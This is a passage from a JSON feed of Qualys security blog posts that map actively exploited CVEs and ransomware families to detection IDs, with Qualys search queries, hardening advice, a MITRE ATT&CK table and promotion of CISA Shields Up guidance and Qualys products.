(China), Cobalt Group (Spain, Ukraine), APT10 (China) \n**10** | CVE-2018-20250 | RARLAB WinRAR | 7.8 | APT32 (Vietnam), APT33 (Iran), APT-C-27 (Iran), Lazarus Group (North Korea), MuddyWater APT (Iran) \n**11** | CVE-2018-7600 | Debian, Drupal | 9.8 | Kelvin SecTeam (Venezuela, Colombia, Peru), Sea Turtle (Iran) \n**12** | CVE-2018-10561 | DASAN Networks | 9.8 | Kelvin SecTeam (Venezuela, Colombia, Peru) \n**13** | CVE-2012-0158 | Microsoft | N/A; 9.3* | APT28 (Russia), APT-C-35 (India), Cobalt Group (Spain, Ukraine), Lotus Blossom (China), Goblin Panda (China), Gorgon Group (Pakistan), APT40 (China) \n**14** | CVE-2017-8570 | Microsoft Office | 7.8 | APT-C-35 (India), Cobalt Group (Spain, Ukraine), APT23 (China) \n**15** | CVE-2018-0802 | Microsoft Office | 7.8 | Cobalt Group (Spain, Ukraine), APT37 (North Korea), Silent Group (Russia), Cloud Atlas (Unknown), Cobalt Group (Spain, Ukraine), Goblin Panda (China), APT23 (China), APT27 (China), Rancor Group (China), Temp.Trident (China) \n**16** | CVE-2017-0143 | Microsoft SMB | 8.1 | APT3 (China), Calypso (China) \n**17** | CVE-2018-12130 | Fedora | 5.6 | Iron Tiger (China), APT3 (China), Calypso (China) \n**18** | CVE-2019-2725 | Oracle WebLogic Server | 9.8 | Panda (China) \n**19** | CVE-2019-3396 | Atlassian Confluence | 9.8 | APT41 (China), Rocke Gang (Chinese Cybercrime) \n \n* according to [cvedetails.com](<http://cvedetails.com/>)\n\n### Detecting the Top 19 CVEs\n\nQualys has detections (QIDs) for [Qualys Vulnerability Management](<https://www.qualys.com/apps/vulnerability-management/>) that cover authenticated and remotely detected vulnerabilities supported by Qualys scanners and [Qualys Cloud Agent](<https://www.qualys.com/cloud-agent/>).\n\nTo return a list of all impacted hosts, use the following QQL query within the VM Dashboard:\n \n \n vulnerabilities.vulnerability.cveIds:[CVE-2017-11882, CVE-2018-8174, CVE-2017-0199, CVE-2018-4878, CVE-2017-10271, CVE-2019-0708, CVE-2017-5638, CVE-2017-5715, CVE-2017-8759, CVE-2018-20250, CVE-2018-7600, CVE-2018-10561, CVE-2012-0158, CVE-2017-8570, CVE-2018-0802, CVE-2017-0143, CVE-2018-12130, CVE-2019-2725, CVE-2019-3396]\n\nYou can [import the following dashboard to track all 19 CVEs](<https://discussions.qualys.com/docs/DOC-7032>) as shown in the template below:\n\n[](<https://discussions.qualys.com/docs/DOC-7032>)\n\n### Alerts\n\nThe Qualys Cloud Platform enables you to continuously monitor for vulnerabilities and misconfigurations and get alerted for your most critical assets.\n\nSee how to set up [notifications for new and updated QIDs](<https://www.qualys.com/docs/version/8.21/qualys-vulnerability-notification.pdf>).\n\n### Tracking Per-Year Environment Impact and Remediation\n\nThe Qualys visualization team has included a Per-Year Environment Insight View Dashboard for easy tracking and remediation. This dashboard has been included in release 2.42 and can be found within the dashboard templates library. It will automatically show your systems whether scanned internally, externally or on remote mobile computers with the groundbreaking Qualys Cloud Agent.\n\n\n\nThis Per-Year Environment Insight View Dashboard will display data per year based on First Found date, followed by Vulnerability Status, Severity, Compliance, Real-Time Threat Intelligence (RTI)s from [Qualys Threat Protection](<https://www.qualys.com/apps/threat-protection/>), and Vulnerability Published Dates, allowing for an easy glance across your environment.\n\n\n\n \n\n### Get Started Now\n\nTo start detecting and remediating these vulnerabilities now, get a [Qualys Suite trial](<https://www.qualys.com/forms/trials/suite/>).\n\nVisit the [Qualys Community](<https://community.qualys.com/docs/DOC-6785>) to download other dashboards created by your SMEs and Product Management team and import them into your subscription for further data insights.", "cvss3": {}, "published": "2019-12-27T18:01:22", "type": "qualysblog", "title": "Top 19+ Vulnerability CVEs in Santa\u2019s Dashboard Tracking", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2012-0158", "CVE-2017-0143", "CVE-2017-0199", "CVE-2017-10271", "CVE-2017-11882", "CVE-2017-5638", "CVE-2017-5715", "CVE-2017-8570", "CVE-2017-8759", "CVE-2018-0802", "CVE-2018-10561", "CVE-2018-12130", "CVE-2018-20250", "CVE-2018-4878", "CVE-2018-7600", "CVE-2018-8174", "CVE-2019-0708", "CVE-2019-2725", "CVE-2019-3396"], "modified": "2019-12-27T18:01:22", "id": "QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4", "href": "https://blog.qualys.com/technology/2019/12/27/top-19-vulnerability-cves-in-santas-dashboard-tracking", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-05T16:35:26", "description": "With most employees still working from remote locations, ransomware attacks have increased steadily since the early months of the Covid-19 pandemic. According to the FBI\u2019s 2020 Internet Crime Report 2400+ ransomware-related incidents in 2020 resulted in a loss of about 29 million dollars. These numbers are only getting worse and do not include damage from incidents not reported to the FBI.\n\nRansomware attacks affect various industries worldwide, and ransomware demands continue to increase. Some recent examples include:\n\n * [Conti Ransomware:](<https://us-cert.cisa.gov/ncas/alerts/aa21-265a>) Conti ransomware is spread using spear phishing campaigns through tailored emails that contain malicious attachments or malicious links and via stolen or weak Remote Desktop Protocol (RDP) credentials. \n * [Netfilm Ransomware](<https://blog.qualys.com/vulnerabilities-threat-research/2021/05/12/nefilim-ransomware>): Nefilim ransomware is distributed through exposed Remote Desktop Protocol (RDP) setups by brute-forcing them and using other known vulnerabilities for initial access, such as Citrix gateway devices.\n * [REvil Ransomware:](<https://blog.qualys.com/product-tech/2021/07/08/kaseya-revil-ransomware-attack-cve-2021-30116-automatically-discover-and-prioritize-using-qualys-vmdr>) REvil is a ransomware family that operates as ransomware-as-a-service (RaaS), has been linked to GOLD SOUTHFIELD, a financially motivated group, and was first identified in April 2019 according to MITRE.\n * [DarkSide Ransomware](<https://blog.qualys.com/vulnerabilities-threat-research/2021/06/09/darkside-ransomware>) : DarkSide ransomware performs brute force attacks and exploits known vulnerabilities in the remote desktop protocol (RDP) to gain initial access. DarkSide ransomware, first seen in August 2020 and updated as v2.0 in March 2021, is associated with the DarkSide group and now often operates as RaaS.\n * [Michigan State University (May 2020)](<https://www.zdnet.com/article/michigan-state-university-hit-by-ransomware-gang/>) - The MSU administrators were given a week to pay an undisclosed ransom demand to decrypt their files. In case MSU officials refuse to pay or choose to restore backups, the cybercriminals were prepared to leak documents stolen from the university&#x27;s network on a special website the group is operating on the dark web.\n * [DearCry and Exchange vulnerabilities](<https://news.sophos.com/en-us/2021/03/15/dearcry-ransomware-attacks-exploit-exchange-server-vulnerabilities/>) - DearCry ransomware attacks exploited Microsoft Exchange Server vulnerabilities CVE-2021-26855 and CVE-2021-27065. These vulnerabilities were being widely exploited before patches were available. Forcing Microsoft to release out-of-band updates. \n * [Colonial Pipeline](<https://www.cnbc.com/2021/06/08/colonial-pipeline-ceo-testifies-on-first-hours-of-ransomware-attack.html>) - Colonial Pipeline was most likely target of ransomware attack due vulnerable, outdated version of Microsoft Exchange. Attackers potentially exploited these vulnerabilities, and as a result, Colonial Pipeline took its systems down to contain the threat, limiting gasoline supply to the east coast. \n\nAs seen above, industries ranging from education, manufacturing, electronics, research, health and more are impacted by ransomware.\n\nTo help organizations combat risks from ransomware, Qualys is introducing Ransomware Risk Assessment service. As outlined in [_our blog_](<https://blog.qualys.com/product-tech/2021/10/05/assess-risk-ransomware-attacks-qualys-research>), the Qualys Ransomware Risk Assessment &amp; Remediation service leverages the security intelligence which is curated by Qualys Research experts to map ransomware families to specific vulnerabilities, misconfigurations, and vulnerable software. The Qualys Ransomware Risk Assessment service enables organizations to:\n\n * Get a unified view into critical ransomware exposures such as internet-facing vulnerabilities and misconfigurations, insecure remote desktop gateways (RDP), as well as detection of risky software in datacenter environment along with alerting for assets missing anti-malware solutions. \n * Accelerate remediation of Ransomware exposure~~s~~ with zero-touch patching by continuously patching ransomware-vulnerabilities as they are detected. The remediation plan also enables proactive patching for prioritized software to help you keep software up to date. \n\n#### **Ransomware Infection Vectors**\n\nAlthough cyber criminals use a variety of techniques to infect victims with ransomware, the most common means of infection are: \n\n * **Remote Desktop Protocol** (RDP) vulnerabilities: RDP allows individuals to see and control the system remotely. It is a very common practice in organizations as it provides easy access to systems remotely. Once cybercriminals have RDP access, they can deploy malicious software on the system, making it inaccessible to legitimate users unless the victim pays the demanded ransom. Shodan search shows currently open and potentially vulnerable RDP services on the internet, and you can buy RDP access for [as low as US$3](<https://www.bankinfosecurity.com/how-much-that-rdp-credential-in-window-a-10590>). \n\n\n\n * **Email phishing campaigns**: Email is a prevalent medium to get malware into the target environment. Cybercriminals use emails to send malicious links to deploy malware on recipients\u2019 machines. It allows cybercriminals to steal sensitive data without breaking through network security and is very common among cybercriminals. \n * **Software vulnerabilities**: Software vulnerabilities are even more prevalent than phishing. Client- and server-side vulnerabilities allow criminals to take advantage of security weaknesses in widely used software programs, gain control of victim systems, and deploy ransomware. Vulnerabilities in VPN systems such as Pulse Secure VPN and Fortinet are common targets as well.\n\n#### **Ransomware Attacks and Exact CVEs To Prioritize for Monitoring**\n\nAs mentioned above known vulnerabilities and weakness are one of the top infection vectors. \n\nQualys research team has performed extensive research on 36 prevalent ransomware families and have mapped them to 64 CVEs and the 247 QIDs that can detect them. The following is just a sample list of some of most widely used ransomware in the attacks along with the CVEs leveraged to infect systems. \n\n**Ransomware**| **Description**| **CVE (s)**| QID (s) \n---|---|---|--- \nConti | The Conti ransomware strain will not only encrypt important files but will also exfiltrate them to a location controlled by the attacker. This method of extortion-ware is used to force victims to pay the ransom in order to avoid the sensitive data from being leaked. Conti operators are known to use well-known hacking tools such as Mimikatz and Cobalt Strike leading up to the encryption of files | CVE-2020-1472, CVE-2021-34527, \nCVE-2017-0143, CVE-2017-0144, CVE-2017-0145 | 91680, \n91668, \n91785, \n91345, \n91360 \nTeslacrypt, PrincessLocker | TeslaCrypt ransomware was uploaded to VirusTotal in November 2014 but was more widely spread in early 2015 and continues to evolve. TeslaCrypt encrypts the files using AES-256 algorithm until the victim pays the ransom in either Bitcoin or Cash Cards. | CVE-2013-2551, CVE-2015-8651 | 168351, 168350, 124422, 168341, 168340, 100271, 124421 \nLocky, Cerber | Cerber ransomware is ransomware-as-a-service (RaaS), meaning an attacker can distribute the licensed copy of this ransomware over the internet and pay commissions to the developer. | CVE-2016-1019 | 256924, 256922, 177873, 176784, 296029, 296028, 170815, 170724, 170711, 170365, 256256, 170264, 236438, 170119, 256214, 170052, 276628, 236342, 157445, 169942, 169941, 169923, 276572, 169854, 169853, 176004, 196742, 196725, 370320, 276455, 175965, 168848, 168813, 168792, 168696, 168694, 168594, 100282, 124879, 124872 \nWannaCry, Badrabbit | The WannaCry ransomware \u2014 formally known as WanaCrypt0r 2.0 \u2014 spreads using an exploit called EternalBlue for a Windows OS vulnerability that Microsoft patched in March 2017. | CVE-2017-0145 | 91361, 91360, 91359, 91347, 91345 \nDearCRy, BlackKingdom | DearCry takes advantage of compromised Microsoft Exchange Servers with vulnerability CVE-2021-26855. When exploited, cybercriminals gain initial access to the Exchange Server and then install web shells. | CVE-2021-26855 | 50107, 50108 \n \n### Unified View of Critical Ransomware Risk Exposures\n\nIt is a daunting task to get a unified view of multiple critical ransomware exposures together such as internet-facing vulnerabilities, misconfigurations as well as unauthorized software. Qualys Ransomware Risk Assessment &amp; remediation service dashboard enables security teams to see all the internet-facing assets that are exposed to ransomware related vulnerability or misconfiguration and take needed actions in the most impactful way. It also enables users to measure and track their effectiveness at addressing vulnerabilities or misconfigurations before they are used for ransomware attacks. \n\n\n\nIn addition, organizations should implement a good cyber hygiene program to scan vulnerabilities, discovery misconfigurations regularly with sufficient detection capabilities such as QIDs enabled, as well as an efficient automated process to deploy important security patches on targeted assets quickly with the scalability needed. \n\n### Qualys Ransomware Risk Assessment &amp; Remediation Service\n\nQualys provides an all-in-one solution to discover, assess, prioritize, monitor, and patch critical vulnerabilities in real time and across your global hybrid-IT landscape. The following sections provide an overview of each of the critical components from Qualys product portfolio and how they can be uniquely valuable in the effort of combatting ransomware attacks. \n\n#### Detect your critical data assets &amp; monitor security blind-spots with CyberSecurity Asset Management (CSAM) \n\nEnables organizations to automatically discover every asset in their environment, including unmanaged assets appearing on the network, inventory all hardware and software, and classify and tag critical assets. \n\n#### Discover, Inventory and Categorize assets \n\nIt is important to know your blind spots to protect against ransomware. Use CSAM to discover all assets, including the ones that are exposed to the internet as well as unknown/unmanaged assets that are connecting to your network. \n\nCSAM automatically organizes your assets by their functional category by analyzing their hardware and installed software. Extends your inventory by incorporating key business information from your CMDB, such as status, environment, ownership, support groups, and business criticality.\n\n\n\n#### Monitor &amp; detect at-risk assets and applications - Assets missing Anti-virus, running unauthorized software \n\nCSAM enriches your asset inventory with in-context, relevant information to help you detect at-risk assets and applications. You can identify and set alerts for assets that are running unauthorized software or are not using anti-virus/endpoint security tools. \n\n * Unauthorized software should be removed to quickly reduce unnecessary attack vectors. With CSAM you can easily define rules to monitor unauthorized software installations. \n * Identify assets missing required security software, such as Antivirus and Endpoint Protection. \n * Identify EOL/EOS software, which can be used as ransomware attack vectors. End-of-Support software is one of the first things hackers look to exploit because they know publishers are no longer providing security updates and patches. \n\n#### Monitor &amp; detect at-risk assets and applications - Assets missing Anti-virus, running unauthorized software \n\nCSAM enriches your asset inventory with in-context, relevant information to help you detect at-risk assets and applications. You can identify and set alerts for assets that are running unauthorized software or are not using anti-virus/endpoint security tools. \n\n * Unauthorized software should be removed to quickly reduce unnecessary attack vectors. With CSAM you can easily define rules to monitor unauthorized software installations. \n * Identify assets missing required security software, such as Antivirus and Endpoint Protection. \n * Identify EOL/EOS software, which can be used as ransomware attack vectors. End-of-Support software is one of the first things hackers look to exploit because they know publishers are no longer providing security updates and patches. \n\n\n\n### Continuous detection &amp; prioritization for Ransomware-specific vulnerabilities with VMDR \n\nThe first step in managing vulnerabilities and reducing risk is identification of assets. [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) makes it easy to identify systems with open ports. For example, hosts with Remote Desktop Protocol (RDP) enabled. \n\n_operatingSystem.category1:`Windows` and openPorts.port:`3389`_ \n\n\n\nOnce the hosts with RDP are identified, they can be grouped together with a \u2018dynamic tag\u2019, let us say \u2013 \u201cRDP Asset\u201d. This helps in automatically grouping existing hosts with this vulnerability as well as any new hosts that spin up in your environment. Tagging makes these grouped assets available for querying, reporting and management throughout the [Qualys Cloud Platform](<https://www.qualys.com/cloud-platform/>). \n\n### **Discover and Prioritize Ransomware Vulnerabilities** \n\nNow that hosts with \u201cRDP\u201d are identified, you want to detect which of these assets have flagged this vulnerability. VMDR automatically detects new vulnerabilities like Windows RDP, Exchange Server vulnerability and more based on the always updated Knowledgebase. \n\nYou can see all your impacted hosts for this vulnerability tagged with the \u2018Ransomware asset tag in the vulnerabilities view by using this QQL query: \n\n**vulnerabilities.vulnerability.threatIntel.ransomware: true** \n\nOr \n\n**vulnerabilities.vulnerability.ransomware.name:WannaCry** \n\nThis will return a list of all impacted hosts. \n\n\n\nUsing VMDR prioritization, the ransomware vulnerabilities can be easily prioritized using \u201cRansomware\u201d Real-Time Threat Intelligence: \n\n\n\nVMDR also enables you to stay on top of these threats proactively via the \u2018live threat feed\u2019 provided for threat prioritization. With \u2018live feed\u2019 updated for all emerging high and medium risks, you can clearly see the impacted hosts against threats. \n\nSimply click on the impacted assets for the \u201cRansomware\u201d feeds to see the vulnerability and impacted host details.\n\n\n\nQualys provides the ability for a Unified Dashboard approach with the key metrics across all Apps providing key metrics against your overall security posture against Ransomware Related data points such as: \n\n * Ransomware Related vulnerabilities \n * Unauthorized Software \n * Misconfigurations leveraged by ransomware \n * Internet Facing Hosts with RDP vulnerabilities and many more\u2026 \n\nThe Unified Dashboard enabled you to track your ransomware exposure, against impacted hosts, their status, and overall management in real-time. \n\n### **Discover and Mitigate Ransomware Misconfigurations such as SMB, Insecure RDP** \n \n\n[Qualys Policy Compliance](<https://www.qualys.com/apps/policy-compliance/>) provides the Ransomware Best Practices policy which contains the critical controls mapped to MITRE ATT&amp;CK mitigations and tactics recommended by [CISA](<https://us-cert.cisa.gov/ncas/alerts/aa21-131a>) and best practices published by [Fireye Mandiant](<https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/wp-ransomware-protection-and-containment-strategies.pdf>). These mitigations are effective across top techniques and can potentially reduce the risk of ransomware attacks. These critical controls can limit attacker initial access and the lateral movement around the network. \n\nAs organizations look to prevent the attacks from happening in the first place, security teams should focus on implementing these controls proactively and effectively across all assets to reduce the risk. By automating the configuration assessment with Qualys Policy Compliance, organizations can ensure golden images to conform to security baselines and prevent images from ever having misconfigurations and identify configurations drifts to prevent security risks. \n\n#### **Mitigation or Important Precautionary Measures and Controls ** \n\nThe Qualys internal research team has identified top five security measures and configuration controls; a security team should consider for their organization to prevent business interruption from a ransomware attack. Research is based on best practices published by FireEye (Mandiant), Cybersecurity and Infrastructure Security Agency (CISA), and CISA MS-ISAC. Policies/technical controls should be implemented. These configuration checks go beyond typical CIS or DISA benchmarks. \n \n\n 1. Enforce Password Policies. e.g. \n * Minimum password age should be set, \n * Password complexity requirements should be enabled. \n * Enforce password history restrictions. \n 2. Employ best practices for use of Remote Desktop protocol e. g \n * Disable RDP services if not necessary. \n * Close unused RDP ports, Audit the network for systems using RDP. \n * Apply Multifactor authentication. \n * Disable or block Server Message Block (SMB) protocol and remove or disable outdated versions of SMB. \n * RDP account controls \n 3. Employ Network security and Firewalls e.g. \n * Enforce firewall policy rules. \n * Deny all rule and allow only required networks, access. \n * Common ports and protocols that should be blocked. \n 4. Enforce Account Use Policies. E.g. \n * Apply account lockouts after a specified number of attempts. \n * Admin approval requirements. \n * Apply UAC restrictions on network logons etc. \n * Least privileges are assigned to users. \n 5. Keep Software Updated \n * Ensure automatic updates are enabled. \n * Patches, software\u2019s should be installed and updated in a timely manner which includes operating systems, applications, etc. \n\n\n\nQualys research has mapped misconfigurations to the relevant MITRE ATTACK techniques (summarized in the table below) to define 237 configuration checks across five security areas such as RDP hardening, user controls, network, protocol and port configuration security, share and password policies and software update policies, essentially helping organizations proactively prevent 20 attack techniques leveraged in ransomware attacks. \n \n\n**TTP Map** \n\nInitial Access (TA0001)| Credential Access (TA0006)| Privilege Escalation (TA0004)| Execution (TA0002)| Defense Evasion (TA0005)| Lateral Movement (TA0008)| Command and Control (TA0011)| Impact (TA0040) \n---|---|---|---|---|---|---|--- \nValid Accounts (T1078)| Brute Force(T1110)| Abuse Elevation Control Mechanism (T1548)| Scheduled Task / Job (T1053)| Impair Defenses (T1562)| Remote Services (T1021)| Non-Application Layer Protocol (T1095)| Data Manipulation: Transmitted Data Manipulation (T1565.002) \nSupply Chain Compromise (T1195)| | Abuse Elevation Control Mechanism: Bypass User Account Control (T1548.002)| Inter-Process Communication (T1559)| Trusted Developer Utilities Proxy Execution (T1127)| Exploitation of Remote Services (T1210)| | \nSupply Chain Compromise: Compromise Software Dependencies and Development Tools (T1195.001)| | Access Token Manipulation (T1134)| | | Remote Services (T1021)| | \n | Unsecured Credentials (T1552)| | | | Remote Services: Remote Desktop Protocol (T1021.001)| | \n | | | | | Remote Services: Remote Desktop Protocol (T1021.002)| | \n | | | | | Remote Service Session Hijacking (T1563)| | \n \n### **Automated Proactive &amp; Reactive Patching for Ransomware vulnerabilities ** \n\nTo keep the ransomware vulnerability patches always up to date on your assets, we strongly encourage users to take advantage of Qualys Zero-Touch Patch that allows users to automatically patch new ransomware-related vulnerabilities which are actively used in attacks. Qualys Zero-Touch Patch enables businesses to patch and address at least 97% of the ransomware related vulnerabilities. Faster and at scale! For more information on Qualys automatic patch capabilities, refer to blog [Automate Vulnerability Remediation with Proactive Zero-Touch Patch](<https://blog.qualys.com/product-tech/2021/09/14/optimize-vulnerability-remediation-with-zero-touch-patch>). \n\nFollowing patch management best practices, using Qualys Patch Management, allows organizations to proactively remediate vulnerabilities related to ransomware and therefore minimize ransomware attacks in their environment. A simple and efficient way to use Qualys patch management to remediate ransomware related vulnerabilities is to leverage the VMDR prioritization report, as described in a previous section, this report can be used to detect assets with ransomware related vulnerabilities. The tight integration between Qualys VMDR and Patch Management allows customers to add those ransomware related vulnerabilities directly from the prioritization report into a patch job. The Qualys engine will automatically map the selected vulnerabilities to the relevant patches, in the customer\u2019s environment, that are required to remediate the vulnerabilities. This will allow IT teams to focus on deploying those patch jobs without the need to worry about researching vulnerabilities and manually finding the relevant patches for those vulnerabilities.\n\n\n\n### **Ready to Learn more and see for yourself?** \n\n[Join the webinar](<https://event.on24.com/wcc/r/3433269/88DA8B72F4DE260B0DE22B7E5632ACBB>), Combating Risk from Ransomware Attacks, to discuss the current state of ransomware and prevention techniques. Webinar October 21, 2021, at 10am Pacific. Sign up now! \n\n**Resources** \n \n\n * [Press Release](<https://www.qualys.com/company/newsroom/news-releases/usa/qualys-launches-ransomware-risk-assessment-service/>) \n * [Ransomware Assessment Service Video](<https://vimeo.com/617379785/>) \n * [Research Powered Qualys Ransomware Risk Assessment &amp; Remediation service](<https://blog.qualys.com/product-tech/2021/10/05/assess-risk-ransomware-attacks-qualys-research>) \n * [Try Qualys Ransomware Risk Assessment Service](<https://www.qualys.com/forms/ransomware/>) \n * Learn more about the research and see the Qualys Ransomware Risk Assessment &amp; Remediation service in action by attending the [webinar](<https://event.on24.com/wcc/r/3433269/88DA8B72F4DE260B0DE22B7E5632ACBB>) \n\n### References\n\n<https://www.ic3.gov/Content/PDF/Ransomware_Fact_Sheet.pdf> <https://www.ic3.gov/Media/Y2019/PSA191002> <https://www.ic3.gov/Media/PDF/AnnualReport/2020_IC3Report.pdf>", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-10-05T12:50:00", "type": "qualysblog", "title": "The Rise of Ransomware", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2551", "CVE-2015-8651", "CVE-2016-1019", "CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2020-1472", "CVE-2021-26855", "CVE-2021-27065", "CVE-2021-30116", "CVE-2021-34527"], "modified": "2021-10-05T12:50:00", "id": "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "href": "https://blog.qualys.com/category/product-tech", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-04T01:27:17", "description": "**_CISA has created Shields Up as a response to the Russian invasion of Ukraine. Qualys is responding with additional security, monitoring and governance measures. This blog details how and what our enterprise customers can do to immediately strengthen their security posture and meet CISA\u2019s recommendations._**\n\nWith the invasion of Ukraine by Russia, the U.S. Cybersecurity &amp; Infrastructure Security Agency (CISA) has created a [program titled Shields Up](<https://www.cisa.gov/shields-up>) and provided specific guidance to all organizations. The Russian government has used cyber operations as a key component of force projection in the past and has targeted critical infrastructure to destabilize a governments\u2019 response capabilities. Critical infrastructure can include supply chain (including software supply chain), power, utilities, communications, transportation, and government and military organizations.\n\n### Protecting Customer Data on Qualys Cloud Platform****\n\nQualys is strongly committed to the security of our customers and their data. In addition to proactive risk mitigation with continuous patch and configuration management, we continually monitor all our environments for any indication of active threats, exploits and compromises. We hold our platforms to the highest security and compliance mandates like [FedRAMP](<https://blog.qualys.com/product-tech/2022/02/24/meet-fedramp-compliance-with-qualys-cloud-platform>). However, given the heightened risk environment around the globe, the Qualys Security and Engineering teams have been at a heightened state of vigilance in recent weeks. We continuously monitor our internal systems in this amplified threat environment. We are working with our security partners to access the latest threat intel. We have implemented additional security, monitoring, and governance measures involving our senior leadership and are committed to ensuring that the [Qualys Cloud Platform](<https://www.qualys.com/cloud-platform/>) remains available and secure to support the enterprises we serve worldwide.\n\n### Urgent: Assess and Heighten Your Security Posture\n\nBased on high-level guidelines provided by CISA, Qualys is recommending all organizations to establish the following actionable steps to adopt heightened cybersecurity posture to protect critical assets.\n\nThere are 4 steps necessary to strengthen security posture per CISA\u2019s Shields Up guidance: \n\n\n * Step 1: Know Your Shodan/Internet Exposed Assets Automatically\n * Step 2: Detect, Prioritize, and Remediate CISA&#x27;s Catalog of Known Exploited Vulnerabilities\n * Step 3: Protect Your Cloud Services and Office 365 Environment\n * Step 4: Continuously Detect a Potential Intrusion\n\n* * *\n\n****Implement CISA\u2019s Shields Up Guidance****\n\n[Try it Now](<https://www.qualys.com/forms/cisa-shields-up-service/>)\n\n* * *\n\n### Step 1: Monitor Your Shodan/Internet Exposed Assets \n\n\n#### Discover and protect your external facing assets \n\n\nAn organization\u2019s internet-facing systems represent much of their potential attack surface. Cyber threat actors are continuously scanning the internet for vulnerable systems to target attacks and campaigns. Often hackers find this information readily available on the dark web or in plain sight on internet search engines such as Shodan.io.\n\nInventory all your assets and monitor your external attack surface. [Qualys CyberSecurity Asset Management (CSAM)](<https://www.qualys.com/apps/cybersecurity-asset-management/>) provides comprehensive visibility of your external-facing IT infrastructure by natively correlating asset telemetry collected by Qualys sensors (e.g. Internet Scanners, Cloud Agents, Network Passive Sensors) and key built-in integrations such as [Shodan.io](<https://blog.qualys.com/vulnerabilities-threat-research/2021/12/20/qualys-integrates-with-shodan-to-help-map-the-external-attack-surface>) and Public Cloud Providers.\n\nOne of the biggest risks is unknown unknowns. These gaps in visibility happen for many reasons \u2013 including shadow IT, forgotten websites, legacy services, mergers &amp; acquisitions (M&amp;A), or simply because a development team exposes an application or database without informing their security team.\n\nCSAM enables you to continuously discover these blind spots and assess their security and compliance posture.\n\n\n\n#### Monitor Industrial Control Systems and Operational Technology\n\nNetwork segmentation traditionally kept Industrial Control Systems air-gapped. However, the acceleration of digital transformation has enabled more of these systems to connect with corporate as well as external networks, such as device vendors and Industrial IoT platforms. Further, the majority of Operational Technology utilizes legacy, non-secure protocols.\n\nBuild full visibility of your critical infrastructure, network communications, and vulnerabilities with Qualys Industrial Control Security (ICS).\n\n\n\n#### Detect and disable all non-essential ports and protocols, especially on internet exposed assets\n\nInventory your internal and external-facing assets, report open ports, and detected services on each port. Qualys CSAM supports extensive query language that enables teams to report and act on detected external facing assets that have a remote-control service running (for example Windows Remote Desktop). \n\n\n\n#### Ensure all systems are protected with up-to-date antivirus/anti-malware software****\n\nFlag assets within your inventory that are missing antivirus, or with signatures that are not up to date. CSAM allows you to define Software Rules and assign required software on a specific scope of assets or environment. For example, all database servers should have antivirus and a data loss prevention agent.\n\n\n\nVerify that your antivirus/anti-malware engine is up to date with the latest signatures.\n\n\n\nFor devices missing antivirus or anti-malware, [Qualys Multi-Vector EDR](<https://www.qualys.com/apps/endpoint-detection-response/>) with Integrated Anti-Malware can be easily enabled wherever the Qualys Cloud Agent is installed to provide immediate threat protection. In addition to basic anti-malware protection, Multi-Vector EDR will monitor endpoint activity to identify suspicious and malicious activity that usually bypasses traditional antivirus such as Living-off-the-Land attacks as well as MITRE ATT&amp;CK tactics and techniques.\n\n### Step 2: Detect, Prioritize and Remediate CISA&#x27;s Catalog of Known Exploited Vulnerabilities\n\nQualys Researcher analyzed all the 300+ CVEs from CISA known exploited vulnerabilities and mapped them to the Qualys QIDs. Many of these CVEs have patches available for the past several years. A new \u201cCISA Exploited\u201d RTI was added to VMDR to help customers create vulnerabilities reports that are focused on CISA exploited vulnerabilities. Customers can use the VMDR vulnerabilities page or VMDR prioritization page and filter the results to focus on all the \u201cCISA Exploited\u201d open vulnerabilities in their environment. \n\nFollowing are some of the critical vulnerabilities cataloged by CISA, as specifically known to be exploited by Russian state-sponsored APT actors for initial access include:\n\n**CVE**| **QID**| **Title**| **Release Date**| **CVSS_V3** \n---|---|---|---|--- \nCVE-2018-13379| 43702| Fortinet Fortigate (FortiOS) System File Leak through Secure Sockets Layer (SSL) Virtual Private Network (VPN) via Specially Crafted Hypertext Transfer Protocol (HTTP) Resource Requests (FG-IR-18-384)| 9/12/2019| 9.8 \nCVE-2019-2725| 87386| Oracle WebLogic Server Remote Code Execution Vulnerability (Oracle Security Alert Advisory - CVE-2019-2725)| 4/27/2019| 9.8 \nCVE-2019-7609| 371687| Kibana Multiple Security Vulnerabilities (ESA-2019-01,ESA-2019-02,ESA-2019-03)| 4/18/2019| 10 \nCVE-2019-10149| 50092| Exim Remote Command Execution Vulnerability| 6/5/2019| 9.8 \nCVE-2019-11510| 38771| Pulse Connect Secure Multiple Security Vulnerabilities (SA44101)| 8/6/2019| 10 \nCVE-2019-19781| 372305| Citrix ADC And Citrix Gateway Arbitrary Code Execution Vulnerability(CTX267027)| 12/23/2019| 9.8 \nCVE-2020-0688| 50098| Microsoft Exchange Server Security Update for February 2020| 2/12/2020| 9.8 \nCVE-2020-4006| 13215| VMware Workspace One Access Command Injection Vulnerability (VMSA-2020-0027)| 12/7/2020| 9.1 \nCVE-2020-5902| 38791| F5 BIG-IP ASM,LTM,APM TMUI Remote Code Execution Vulnerability (K52145254) (unauthenticated check)| 7/5/2020| 9.8 \nCVE-2020-14882| 87431| Oracle WebLogic Server Multiple 